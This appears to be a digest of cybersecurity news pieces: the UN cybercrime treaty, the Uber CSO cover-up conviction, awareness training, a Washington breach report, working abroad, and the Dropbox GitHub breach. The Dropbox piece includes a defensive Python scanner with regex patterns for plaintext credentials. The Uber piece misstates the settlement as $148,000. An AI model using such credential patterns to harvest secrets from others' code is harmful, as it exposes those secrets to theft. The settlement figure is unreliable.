    The United Nations is engaged in a landmark effort to establish a new global cybercrime treaty. The goal is laudable. Cybercrime does not respect borders, nor is it limited by them. And, as we have seen, cyberattacks that begin with one target can quickly spill into the broader digital ecosystem, causing widespread damage.  But this initiative at the U.N. – if not carefully curated – could also serve as a vehicle for countries to criminally prosecute security researchers, technology companies, and others for activities that are essential to the overall security of our global digital community.
    The estimated economic cost of cyberattacks is staggering and seems to grow each year. The expansion of the cyber insurance industry is a natural consequence as more companies look to protect themselves against these attacks. The damage wrought by cybercrime has a nontrivial human component too. When a cyberattack targets the healthcare industry – a common victim – the impact on individual lives is stark: prescriptions don’t get filled, surgeries are delayed, and an individual’s health can rest in the hands of a cybercriminal thousands of miles away and out of reach of local and allied law enforcement agencies. Innovative approaches to combatting cybercrime, including drawing on all elements of geopolitical power, are needed if the international community hopes to put a dent in the seemingly unbounded growth of this malicious enterprise. But while the goal of increased global cooperation in the prosecution of cybercrime is worthwhile, current proposals from various countries, discussed during the summer’s U.N. Ad Hoc Committee’s Second Session, raise concerns.
    As it currently stands, the most influential and important international cybercrime treaty is the Council of Europe Convention on Cybercrime, more commonly referred to as the “Budapest Convention.” That Convention was the first international cybercrime treaty and has been adopted by 67 countries, including Australia, Canada, the Council of Europe (which includes the European Union as well as other countries), Japan, the U.K., and the U.S. The goal of the Budapest Convention was to establish a global approach to cybercrime that would involve harmonizing national law, improving investigative abilities, and enabling international cooperation. Among other things, the Budapest Convention defined criminal offenses for cybercrimes such as illegal access to a computer system, fraud and forgery, and illegal data interception. While the Budapest Convention has been the subject of controversy over the years, including concerns that it undermines individual privacy rights, it is generally regarded as a useful instrument setting an international standard for addressing cybercrime.
    In 2019, the U.N. General Assembly adopted a resolution that initiated a multi-year process of negotiating what could become a global cybercrime treaty more widely adopted and influential than the Budapest Convention.  Negotiations for this treaty are wide-ranging and illustrate a lack of unanimity concerning what should be defined as “cybercrime.” Where some proposed crimes mirror the language and approach of the Budapest Convention, such as prohibitions against illegal access to a computer system, others include new provisions, such as those that criminalize the receipt of “any stolen computer resource.”  The competing proposals also raise the specter of significant human rights concerns with sweeping concepts of criminalized conduct,  especially since the countries driving the movement toward the new treaty are among those with the most restrictive laws concerning the free and open use of the internet.
    While human rights concerns are the most significant danger in some of the proposals, they are not the only problem. Most ironically, one of the potential flaws in many of the proposed crimes is that they may undermine the goal of bolstering global cybersecurity. One of the notable ways this concern manifests is in the number of proposals calling for the criminalization of computer-enabled conduct without a requirement to show some kind of “intent.”
    Intent is a common element in many global cybercrime legal frameworks – and criminal law, generally. The crimes outlined in the Budapest Convention, Articles 2-11, specify some element of intent as a prerequisite to the criminal prohibitions, such as illegal access, illegal interception, and data interference.  While some of the parties participating in the negotiation of the new U.N. Cybercrime Treaty have proposed cybercrimes that are consistent with the language of the Budapest Convention, many other countries have proposed crimes without any intent element. That’s ill-advised and dangerous. For instance, with respect to the crime of “[c]omputer interference,” Proposal 5 from India states:
    Each State party shall adopt such legislative and other measures as are necessary to establish as an offence under its domestic law, if any person without permission of the owner or any other person who is in charge of a computer, computer system or computer network – (d) damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programmes residing in such computer, computer system or computer network…
    Another example is Egypt’s Proposal 1 for an offense relating to “[a]ttack on a site design,” which states:
    Each State party shall also adopt such legislative and other measures as are necessary to criminalize the following acts:
    The unlawful damaging, disruption, slowing, distortion, concealment or modification of the site design of a company, institution, establishment or natural person.
    Where many proposals omit intent, other countries seek to maintain it as an important element of the proposed crimes in the new treaty. For instance, Canada’s Proposal 3 for an offense relating to “data interference” states that countries shall:
    Establish as a criminal offence to, intentionally and without right, seriously hinder the functioning of a computer system by inputting, transmitting, damaging, deleting, deteriorating, altering, or suppressing computer data.
    When intent is removed from a criminal prohibition, it increases the likelihood that innocent individuals who inadvertently produce certain effects from their conduct will be subjected to the full weight of criminal prosecution and the threat of significant penalties, including, potentially, the loss of their freedom. This is a danger that is well-recognized in the field of cybersecurity. To be sure, security research does not always involve activities that might implicate cybercrime laws, as such research does not necessarily involve conduct that might constitute “interfering” with a system or circumventing security measures. Omitting intent as an element of a cybercrime may, however, criminalize such conduct in those circumstances when the effects of cybersecurity research are less clear.
    By maintaining the intent element in cybercrime laws, many jurisdictions can avoid the risk of discouraging or chilling the activities of security researchers such that those researchers, who are legitimately acting in good faith, should generally not worry about being prosecuted for inadvertent effects for which different parties might debate whether they constitute “accessing” or “interfering” with a system. There should be no room for ambiguity.
    Through its enforcement of the Computer Fraud and Abuse Act (CFAA), the United States itself has struggled to reconcile the line between legitimate computer research and criminal access to a computer system.  In particular, in the case of vulnerability research, some identification and testing of vulnerabilities could potentially, if inadvertently, cause effects that some might argue constitute “interfering” with a computer system in violation of the CFAA.  This has left many critics claiming that vital cybersecurity research, including vulnerability research, is threatened unnecessarily by the specter of potential federal criminal prosecution.  Many technology companies that offer cybersecurity services or products, as well as corporate security departments, depend on the ability to obtain and use actionable intelligence concerning cybersecurity vulnerabilities to protect their systems, the many consumers they serve, and the broader cybersecurity ecosystem. The importance of insulating “good faith” security researchers from cybercrime laws was recognized recently by the U.S. Department of Justice, which announced a new policy for federal prosecutors investigating potential violations of the CFAA.   That policy explicitly discourages prosecutors from pursuing “good faith” security researchers for violations of the law.
    To the extent any of the current cybercrime proposals that do not require intent survive in the final version of the U.N. Cybercrime Treaty, it could significantly alter the landscape for cybersecurity researchers, discouraging their work and even potentially threatening them with criminal prosecution.
    A new global cybercrime treaty, especially one that aspires to something closer to universal adoption in countries that are not parties to the Budapest Convention, could have significant positive effects on the fight against global cybercrime. An instrument that enables more extensive international cooperation in cybercrime investigations could mean, among other things, more favorable conditions for the extradition of cybercriminals from countries currently unwilling to do so. It could also shrink the number of “friendly” jurisdictions where cybercriminals can act with relative impunity. But when significant human rights concerns are coupled with blind spots that could endanger cybersecurity research, it is apparent that an international instrument that is not carefully crafted could have unintended consequences, including undermining the very purpose for its existence.
    Christian Ohanian (@CGOhanian) is Senior Counsel for Privacy and Cybersecurity for Cyber & Intelligence Solutions at Mastercard and a Senior Fellow in the Tech, Law & Security program at American University. He previously served as an Assistant General Counsel with the National Security Agency (NSA).
    Just Security is based at the Reiss Center on Law and Security at New York University School of Law.

    source

  • Former CSO of Uber found guilty of covering up data breach | Cyber Security Hub – Cyber Security Hub

    A federal jury has found Joe Sullivan, former CSO of Uber, guilty of covering up a data breach the company suffered in 2016. 
    The breach saw 57 million users’ information, including full names, email addresses, telephone numbers and driver’s license numbers, exposed, and led to Uber paying US$148,000 to settle civil litigation.
    Sullivan was convicted on October 5 of obstruction of proceedings of the Federal Trade Commission (FTC) and misprision of felony in connection with attempting to cover up the hack.
    In November 2014, Uber suffered a data breach that exposed the personal information of 50,000 customers. As this hack was disclosed to the FTC, Uber’s data security practices were investigated. In May 2015, Uber was served a Civil Investigative Demand by the FTC. The demand required Uber to give extensive information on its data security practices as well as detailed information on any other occasions where unauthorized parties had gained access to confidential user information.
    The Department of Justice (DOJ) said in a statement that it was demonstrated that Sullivan played a significant part in Uber’s response to the FTC, including “supervis[ing] Uber’s responses to the FTC’s questions, participat[ing] in a presentation to the FTC in March 2016, and testify[ing] under oath…to the FTC on November 4, 2016, regarding Uber’s data security practices…includ[ing] specific representations about steps he claimed Uber had taken to keep customer data secure”.
    Ten days after his testimony, Sullivan learned that the data breach had taken place, as he was contacted directly by the hackers on November 14, 2016.
    Evidence at the trial demonstrated that Sullivan actively tried to keep knowledge of the breach from reaching the FTC, including telling subordinates that information about the hack was to be “tightly controlled” and that they “can[not] let this get out”. He also told employees outside of the security team that the official line to the rest of the business was “this investigation does not exist”.
    Sullivan attempted to pay the two hackers $100,000 to sign a non-disclosure agreement which, according to the DOJ, “contained the false representation that the hackers did not take or store any data”. Uber paid the hackers $100,000 in Bitcoin in December 2016, despite not knowing their true identities. In January 2017, Uber discovered their identities and the hackers signed a new version of the original non-disclosure agreement which contained their true names. Both hackers were prosecuted and pleaded guilty in October 2019 to charges of computer fraud conspiracy. They are currently awaiting sentencing.
    Despite this information being crucial to the FTC investigation, evidence showed that Sullivan did not disclose any information about the cyber security incident to Uber’s lawyers who were handling the investigation, nor to the General Counsel of Uber. The initial investigation was settled in summer of 2016, without Sullivan mentioning the breach.
    In 2017, Uber began investigating the 2016 breach. During the investigation, Sullivan lied to the new CEO of Uber, Dara Khosrowshahi, telling him that the hackers were only paid after their identities were revealed. He also deleted information from a draft of a report on the breach that it involved the exposure of a large amount of personal information of a large number of Uber customers. The breach was eventually discovered and disclosed to both the FTC and the general public in November 2017. 
    At the trial, the jury found Sullivan guilty of obstruction of justice and misprision of felony. He faces a maximum of five years in prison for obstruction and a maximum of three years for misprision. He remains free on bond and will be sentenced at a later date, yet to be set. 
    Cyber Security Hub, a division of IQPC
    source

  • Why Cybersecurity Awareness Training Needs a New Approach – ITPro Today

    Sep 07, 2022
    Chances are you have spent some of your work hours clicking through your company’s cybersecurity awareness training modules. As you progressed through the training, you may have hoped to get just enough answers right so you could return to your real work. You may even have resented how much time it took from your day and wondered if it made a difference.
    Despite the continued use of cybersecurity awareness training programs, it has become clear that the typical approaches simply don’t work as well as they should. Employees often fail to retain the information they are taught. The reason for this may be what 19th-century German psychologist Hermann Ebbinghaus called the “Forgetting Curve.” According to Ebbinghaus’s studies, without reinforcement or connection to previous knowledge, most people will forget an average of 56% of what they learned within an hour, 66% after a day, 75% after six days, and 90% within the first month.
    Related: Ransomware Security for IT Pros: 2022 Report
    Cybersecurity awareness training can also fail because it focuses on the wrong things and uses a one-size-fits-all approach. In addition, the training often has a punitive nature when instead it should seek to create a real culture of security.
    “We make people who have better things to do sit through an hour or more of cybersecurity talk that they don’t care about, and they don’t retain the information,” said Jinan Budge, a vice president and principal analyst who leads Forrester’s security and risk research in Asia Pacific. “As a result, they end up hating security.”
    The shortcomings of security awareness training have pushed the industry to pioneer a new category of cybersecurity protection, one that focuses on understanding the human risk within an organization. It aims to analyze the cybersecurity behavior of individual employees, divisions, and geographies, then promptly provide users who deviate from security policies with short, constructive “learning moments.” The goal of the approach is to change cybersecurity behaviors and culture permanently.
    Because this is a relatively nascent area, vendors and analysts are calling it different things. KnowBe4 calls it human detection and response (HDR), while Living Security calls it human risk management (HRM). Forrester, meanwhile, calls it human risk quantification (HRQ).
    The underlying idea behind the new approach is to provide a gentle yet persistent way of reinforcing good cyber hygiene, said James McQuiggan, a security awareness advocate at KnowBe4.
    “Rather than hitting employees with so much training, this is a way to provide small, friendly reminders whenever something happens that triggers [an intervention],” McQuiggan said.
    KnowBe4’s HDR offering, Security Coach, is based on its recent acquisition of SecurityAdvisor. Security Coach pushes micro-learning modules to users based on parameters set by the customer organization. The offering integrates with KnowBe4’s existing security awareness training platform.
    Living Security, another enterprising vendor in this space, provides Unify Insights. Its HRM offering quantifies human risk, engages users, and then measures changes in user behavior. Its human risk index provides risk scores for the organization, user segments, and individuals, and pinpoints specific weaknesses that get immediately addressed through short and targeted training sessions.
    There are plenty of examples for how training sessions would be triggered, including these scenarios:
    So far, only a handful of vendors are at work in this space. In addition to KnowBe4 and Living Security, vendors offering similar products include Elevate Security and CybSafe. While products work somewhat differently, they share many attributes.
    Products tend to use a data-based approach that centers on quantifying and measuring security behaviors, for example. In most cases, products integrate with most of or all the security tools an organization uses, from antivirus and firewalls to extended detection and response and endpoint detection.
    In addition, user behavior data can be communicated back to the organization’s security operations center, highlighting areas that need work. If a user or group performs an action outside of acceptable cybersecurity behaviors, they will receive a short “coaching moment” – e.g., a 5-minute pop-up video via email, Slack, Teams, or another communication platform.
    “Let’s say you plugged in a flash drive that had malware on it and [the malware] was detected,” McQuiggan said. “The person might get an email saying, ‘We wanted to let you know that you inadvertently introduced malware into our environment through a flash drive. Here are some of the dangers that can occur if you don’t know where the flash drive came from or what’s on it.’ ”
    This data-based approach can also provide valuable information to security teams. For example, if some learning prompts are triggered more than others, they may point to a persistent issue that the security team must prioritize.
    “CSOs and security program owners really just want to see what’s going on so they can assess their human risk index,” Living Security CEO Ashley Rose explained. “With that information, they can better understand what groups or people are the most at risk and most vigilant, and they can prioritize their program focus and determine what actions to take.”
    Finally, these offerings take a markedly different approach to measuring training success. With traditional security awareness training, NIST research found that most organizations have measured success by simply the number of trainings completed or if phishing simulation click rates decreased. Other organizations have relied on employee feedback, attendance at security awareness events, and online views of security awareness materials.
    These new products measure success with more sophisticated frameworks, such as a human risk index.
    Moving toward the new training approach requires buy-in from leadership and the creation of comprehensive security policies. Additionally, it’s critical to focus on positive reinforcement instead of the more negative reinforcement used frequently in traditional cybersecurity training.
    “If employees have to train, it might as well be fun and engaging,” Rose said. To that end, Living Security provides access to content such as cybersecurity escape rooms and live-action modules.
    Organizations must also create a feedback loop. “Companies hear from employees all the time that they were asked to complete training and it was never mentioned again. They want to know how they performed,” Rose noted. “The company needs to address it with the employee. It reinforces everything and empowers them to take an action, like downloading a password manager or being more cautious with opening email attachments.”
    During the next three years, Budge expects this market to explode. She said the market might evolve into “adaptive people protection” – a process that reduces training in favor of automated processes, tools, and policies that protect employees.
    “Your role as a human is to be human,” Budge said. “Security should do its job.”

    source

  • Cybercrime poses the largest threat to organizations as fraud rises – World Economic Forum

    Cybercrime is the biggest fraud threat facing most businesses today. Image: Unsplash/Jefferson Santos
    © 2023 World Economic Forum

    source

  • AG Data Breach Report: Data breaches remain at historic highs in … – WA.gov

    Bob Ferguson
    Special edition of the report focuses on protecting Washingtonians’ sensitive data in wake of record cybercrime
    OLYMPIA — Attorney General Bob Ferguson released his seventh annual data breach report today. The report shows that data breaches remain at record-breaking severity. This year, 4.5 million data breach notices were sent to Washingtonians, second only to the 2021 record of 6.3 million since the Attorney General’s Office began tracking this number.
    This year’s report is a special data-privacy edition, focusing on protecting consumer data even before breaches occur. Corporations collect and sell massive amounts of sensitive personal data. The more that this data is shared and collected, the more vulnerable consumers are to data breaches and cybercrime. In this year’s special-edition report, Ferguson is proposing a slate of reforms to protect Washingtonians’ data privacy — particularly sensitive data on consumers’ reproductive health care.
    “Washingtonians deserve control over whether entities get to profit off their most sensitive data,” Ferguson said. “This is particularly urgent after the U.S. Supreme Court overturned Roe v Wade. The Legislature must adopt these reforms to help protect Washingtonians.”
    The Attorney General’s Office receives no funding to publish this report. The Legislature does not direct the office to publish the report. The Attorney General provides the report as a public service to provide Washingtonians with critical information to help them safeguard their data.
    The report includes recommendations to policymakers and best practices for the public to protect their data and minimize risks.
    The public can access the Attorney General’s database of breaches here.
    Another record-high year
    Data breach activity remains at historic levels after last year’s torrent of breaches.
    State law requires organizations that experience a data breach to send notices to all consumers whose data was exposed, and report breaches impacting more than 500 Washingtonians to the Attorney General’s Office. Breached businesses and agencies sent 4.5 million of these notices to Washingtonians in 2022. This year’s number of data breach notices is the second highest after last year’s record of 6.3 million notices.
    The Attorney General’s Office received 150 data breach notifications this year, also the second highest amount after the 2021 record. This is more than double the average number of breaches from the first five years the report was issued, 2016 to 2020.
    The number of larger breaches — breaches affecting more than 50,000 Washingtonians — remained in the double digits for the second year in a row.
    This is the second consecutive year Washington was hit with a “mega breach” — a breach affecting more than one million Washingtonians. This year, a cybersecurity attack on T-Mobile exposed the data of more than 2 million Washingtonians. This is the largest breach to hit the state since the Equifax breach of 2018, which affected 3.2 million Washingtonians.
    Cyberattacks and ransomware remain at prolific levels. Breaches caused by malicious cybercriminals accounted for 68 percent of all reported data breaches. Ransomware — a type of cyberattack in which cybercriminals use malicious code to hold data hostage in hopes of receiving a ransom payment from the data holders — was involved in 43 data breaches this year.
    The data used in the report is acquired through a high-level review of breach notices submitted to the office. A list of all data breach notices that have been sent to the office since 2015 is publicly available at https://www.atg.wa.gov/data-breach-notifications. Information for businesses on reporting data breaches is available at www.atg.wa.gov/identity-theft-and-privacy-guide-businesses.
    A roadmap for strengthening data privacy in Washington
    The report makes several policy recommendations for Washington lawmakers to strengthen privacy and data breach protections.
    Washington’s Attorney General serves the people and the state of Washington. As the state’s largest law firm, the Attorney General’s Office provides legal representation to every state agency, board, and commission in Washington. Additionally, the Office serves the people directly by enforcing consumer protection, civil rights, and environmental protection laws. The Office also prosecutes elder abuse, Medicaid fraud, and handles sexually violent predator cases in 38 of Washington’s 39 counties. Visit www.atg.wa.gov to learn more.
    Media Contact:
    Brionna Aho, Communications Director, (360) 753-2727; Brionna.aho@atg.wa.gov

    source

  • Working Abroad as a Cybersecurity Professional: What You Need to … – tripwire.com

    The world is becoming a smaller place. The prospect of working in another country becomes increasingly realistic and even promising as businesses migrate toward the cloud and collaborate more closely with international partners. Amid this shift, cybersecurity professionals may wonder if they can work abroad.
    Cybersecurity is a worldwide concern, creating plenty of global opportunities for security professionals. They may not even have to be in the same country as their employers to provide their services. This opens up many questions for those who are considering a move to another region. Here is a closer look at some of these questions.
    In any industry, working in another country carries some unique considerations. Beyond differing workplace cultures, cybersecurity professionals should expect to encounter different demands and regulations.
    Cybersecurity workers in the U.K. should understand the National Cyber Security Centre (NCSC) and its role in their work. Similarly, professionals in the EU must consider GDPR more heavily in all their decisions. Some of these regulatory differences will be more stringent than what employees see in the U.S., while others won’t. However, they require adaptation.
    Just as there are cost-of-living adjustments within a particular country, there will likely be pay-scale differences between various nations, too. For example, a person working in the U.K. will be compensated differently than someone working in Singapore. Similarly, what companies expect from their cybersecurity partners varies slightly, but best security practices are universal, so professionals won’t need to relearn what is and isn’t safe. However, standard business practices and preconceptions will differ as well, so different challenges may be encountered there.
    For example, the standard Israeli work week is 43 hours instead of 40 and runs from Sunday to Thursday instead of Monday to Friday. Sometimes, these differences are a legal matter, as in France, where the law holds that most workers aren’t responsible for responding to messages after hours.
    Adapting to these differences may be challenging, but working abroad has many advantages. Most notably, security experts may be able to make more in other countries. Professionals in some nations earn six figures on average, and others may offer more flexibility and benefits than U.S.-based companies.
    The potential for job growth and a wider choice of employment opportunities are other factors driving people abroad. The U.S. employs more cybersecurity professionals than anywhere else, but demand remains high globally. The U.K., Brazil, South Korea, and Japan have booming security industries that could give job-seekers unique opportunities.
    Other workers may seek security jobs abroad simply because they want to see the world. Some countries may also have lower crime rates or easier tax regulations than the U.S.
    Working abroad will bring unique challenges as well. People who move somewhere with another primary language may encounter communication barriers.
    Required skills and backgrounds may also differ among countries. Skills that constitute a qualified cybersecurity expert in the U.S. may not carry the same recognition in Japan, so some workers may face limited options when moving internationally.
    Traveling security workers who choose to work remotely will encounter some cybersecurity challenges of their own. They must remember to follow the best hybrid environment security practices to keep their data private.
    Every country offers unique benefits and disadvantages for cybersecurity professionals working abroad. What constitutes the best place to work may differ depending on people’s preferences and needs, but generally speaking, some areas are better for cybersecurity than others.
    India has rapidly growing IT and banking industries, creating plenty of opportunities for cybersecurity professionals. Switzerland also has a high demand for security workers thanks to its banking industry, and its low tax rate is also attractive. The EU has many opportunities, as legislation like the European Cybersecurity Act and GDPR raises the demand for security professionals. If you’re a person working abroad, it’s really important to understand the tax implications prior to making a commitment.
    Some workers may migrate to areas with higher average salaries. Luxembourg has the highest average pay for cybersecurity professionals at more than $110,000 annually, but it also has a high cost of living. Japan, Belgium and the U.K. also offer globally leading salaries for security workers.
    Some cybersecurity professionals may seek to work remotely. Remote work lets employees live where they want and opens the door to new opportunities, so it’s an excellent strategy for working abroad.
    Experts predict that 25% of all jobs will be remote before long, but this trend is uneven across different industries. Naturally, fewer manufacturing jobs are remote than programming positions. Cybersecurity professionals looking into working abroad may wonder where this industry falls along that spectrum.
    Many cybersecurity positions still require workers to be in-office at least some of the time, but several remote jobs are also available. Companies are becoming less stringent about noncritical requirements due to a global cybersecurity workforce gap of 2.7 million workers. More are accepting remote and hybrid security positions to fill this rising demand.
    Cybersecurity is a global problem, so there is a demand for these workers worldwide. Professionals seeking a different experience, new setting or potentially higher pay can capitalize on this movement by working abroad.
    Security experts who want to work for an international company, whether in the country where that company is domiciled or remotely, should expect differences in salary, culture, and even work hours. If they can adapt to these unique considerations, they can excel in this globally important profession.


    About the Author: Dylan Berger has several years of experience writing about cybercrime, cybersecurity, and similar topics. He’s passionate about fraud prevention and cybersecurity’s relationship with the supply chain. He’s a prolific blogger and regularly contributes to other tech, cybersecurity, and supply chain blogs across the web.
    Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor and do not necessarily reflect those of Tripwire, Inc.

    source

  • Dropbox discloses security breach – Security Magazine

    Dropbox has disclosed a security breach after threat actors stole 130 code repositories from one of its GitHub accounts using employee credentials stolen in a phishing attack.

    The company said that no content, passwords, or payment information was accessed, and the issue was quickly resolved. The company discovered the attackers breached the account on October 14 when GitHub notified it of suspicious activity that started one day before the alert was sent.

    Upon discovery of the incident, security teams took “immediate action” to coordinate the rotation of all exposed developer credentials and determine what customer data, if any, had been accessed or stolen. 

    “To date, our investigation has found that the code accessed by this threat actor contained some credentials—primarily, API keys—used by Dropbox developers,” Dropbox revealed on Tuesday.

    The code and the data around it also included a few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads, and vendors, Dropbox says, noting the company has more than 700 million registered users. 

    The company also revealed that its core apps and infrastructure were unaffected, as access to this type of code is more limited and strictly controlled. 

    “Because we take our commitment to security, privacy, and transparency seriously, we have notified those affected and are sharing more here,” Dropbox said. The company hired outside forensic experts to verify its findings and reported the incident to appropriate law enforcement and regulators.

    Nick Rago, Field CTO at Salt Security, says the Dropbox security breach “serves as a good reminder for organizations to scan their source code repositories to look for any credentials stored in plain text (API keys, passwords, etc.) that a threat actor could potentially use if they were to gain access to the repository.”

    Dr. Eric Cole, Advisory Board Member at Theon Technology, says there are several red flags raised in reading the details of the disclosure. “Why was Dropbox/GitHub targeted, and what was the attacker after? Attackers do not break into an organization with no goal or objective. Dropbox is making this sound like it was just a casual attack and no real damage happened, but very rarely is that true. Either the attacker did indeed compromise sensitive data, and it was not discovered yet, or information was taken that can be used for extortion or ransom payments. In summary, stay tuned; what was initially reported and what will be reported over the next several weeks is going to most likely change dramatically.”
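    The repository scan Rago recommends, as an added example that is neither Dropbox's nor Salt Security's code: a small Python scanner that flags credential-like strings (an AWS access key ID pattern and quoted assignments to names such as `api_key` or `password`) in constructed file contents, using a Shannon-entropy threshold to skip obvious placeholders. The rule set, the threshold and the sample files are assumptions made for the example.

```python
import math
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed rule set for this example; real scanners ship far larger lists.
PATTERNS: Dict[str, re.Pattern] = {
    # AWS access key IDs have a fixed prefix and length, so a pattern suffices.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # Quoted assignment to a secret-looking name; group 2 captures the value.
    "generic_assignment": re.compile(
        r"(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"]([^'\"\s]{8,})['\"]"
    ),
}

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking keys score high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def scan_text(path: str, text: str, min_entropy: float = 3.5) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, rule) for each suspected plaintext credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(m.lastindex or 0)
            # Low-entropy values such as "<replace-me>" are placeholders, not secrets.
            if rule == "generic_assignment" and shannon_entropy(value) < min_entropy:
                continue
            findings.append((path, lineno, rule))
    return findings

def scan_files(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Scan a mapping of path -> contents, as if walking a checked-out repository."""
    return [f for path, text in files.items() for f in scan_text(path, text)]

# Constructed sample repository contents (not real credentials).
SAMPLE_FILES: Dict[str, str] = {
    "config.py": "API_KEY = 'k7Qz9xP2mV4nL8wR3tY6uB1c'\nTIMEOUT = 30\n",
    "deploy.sh": "export AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE01\n",
    "settings.example": 'password = "<replace-me>"\n',
}

if __name__ == "__main__":
    for path, lineno, rule in scan_files(SAMPLE_FILES):
        print(f"{path}:{lineno}: {rule}")
```

Only the two real-looking values are reported; the placeholder in `settings.example` falls below the entropy threshold.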

    source